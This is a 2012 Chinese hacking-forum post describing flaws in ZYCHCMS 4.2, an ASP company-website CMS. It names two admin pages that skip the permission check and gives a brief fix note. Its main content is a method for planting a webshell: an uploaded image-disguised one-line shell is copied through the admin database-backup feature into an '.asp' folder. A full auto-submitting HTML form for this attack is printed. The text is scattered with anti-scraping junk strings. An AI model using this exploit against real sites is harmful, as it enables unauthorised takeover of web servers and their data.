找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1806|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

3 H- A0 ?4 B1 E+ `0 b5 @6 m+ c& v% l+ @% ]
! f0 Z2 ^8 G: E- E4 D

  L, b& a3 }2 U# s影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
, t5 Z2 l9 {0 E) q. R. |# Z8 | ①SQL注射漏洞
! {% m- z% d: I5 c$ `( B( O8 S. G 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
1 C4 I* k+ k/ P' E" w" f 漏洞原因:未过滤" `" x( w7 I- B2 Q+ I0 v+ q; g# J
漏洞代码:
" Z3 C% u! i) Y/ w  n7 f0 h 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
0 v( z6 p5 `# @ 修复方法:在文件开头加入代码1 ]; b4 f( ]( r; _
3 ~$ u' D* y! ?# i4 @- D

* c" W1 j. |& j4 r②后台拿WBSHELL1 _3 d% l4 P" X& ?* i0 w
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。, q. d: `, G  {5 r. J: Z
这里在网上找了一个,改了下,将就着用。: B0 n) {+ O* p- h7 h  T' A2 P0 B
以下是代码本地提交代码
# m& ~7 E$ b6 B! l + `& ~: @9 R+ G. j, R* t- v

  }- |. X& H# |( ^" Z<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>4 \' V# P5 L2 Q0 v1 i
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
# Y4 d1 @% b3 b# ?8 B7 E. B3 m1 V; Z <tr>+ X/ N# Y# f+ V
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>+ c2 }( K9 H/ o/ v: ?
</tr>
6 s0 _# B! z2 t1 j3 v9 _# {0 l <tr>& ?: n3 b& c: x: I, k! R
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>, p/ w7 t! e* E' }
</span>  p3 {: n  M9 ]4 K2 C
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
* b. W3 S5 Q5 Y* ]1 z. n  D" k. c <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >* n( k% [1 d) |/ n! k
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>% E; ~' [' L& i4 ^
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
0 q4 a' W, u4 s! X! P, z5 w <div align=”left”>
. x% Y6 y; N: G$ H <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
, }# V/ Z7 \+ C' I# U! M <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
- Z% o1 w0 m+ E+ o. }" W- g# O <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />4 o& Z/ A6 S. _3 M
</div></td>0 C: m  u6 p- J' H) {& @9 c- [
</tr>
2 t3 @( M( o4 t, D( \( ? <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>0 A; G6 J0 x2 h0 S: ^
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td># c! P' ^8 o0 H' }. ~+ T1 ?0 ?) T" J
<td class=”td”><div align=”left”>( ?  r) F' ?( A$ G7 Y
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />9 V- H$ _6 A+ [0 f
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>) Z! [# I: d# m6 f% s" m
</tr>
! F) X1 @0 Q/ h; _1 `  A <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>8 e6 N6 A, J$ O7 E% M
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
6 O' a: o. l9 e/ O5 r3 j <td class=”td”><div align=”left”>
( f$ s) l+ m- { <input type=”submit” value=”确定备份” class=”btn”% s# h7 j! P( T6 L6 k, h
</div></td>- p( R5 E+ G& x! {, r& r
</tr>
+ F3 D0 S+ l" X" A/ L  ?7 Y' ~  _ </table></td></tr></form>
  h/ ^( f' ?% J! Z( j0 P </table>8 Q9 m) q: m! S) B* [8 }5 F$ }4 \, p
</td># E, a) ~# ~5 [
</tr>. }4 `0 f/ r8 q/ q+ h4 D" ^, }$ g
</table>) b$ C. `0 K- z$ U# ~. ^
<script>, U9 \8 u' T+ M/ K% V3 v# I5 [) Y
document.all.add.submit();0 }) p: ]+ z8 b4 {! [  J2 S' C% t
</script>3 s, T5 S/ Z4 `! M) [0 K

' E( E" t% r6 B: D, F: M: y$ x& d5 S" G/ ]) v  D

& _( w; x2 A+ F' h0 J2 @8 Z1 c+ p9 U4 N- ^7 w7 \# h

2 v& B/ N' _4 L6 L8 U, l* s$ H! X& m8 m9 M
6 Z  X& K) u1 f+ q2 B

$ Z! j- U. I' H; K! o/ J/ |% a+ o0 C1 r2 S& ]' T/ x
: _  C+ F, Z+ E$ W3 }) P
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表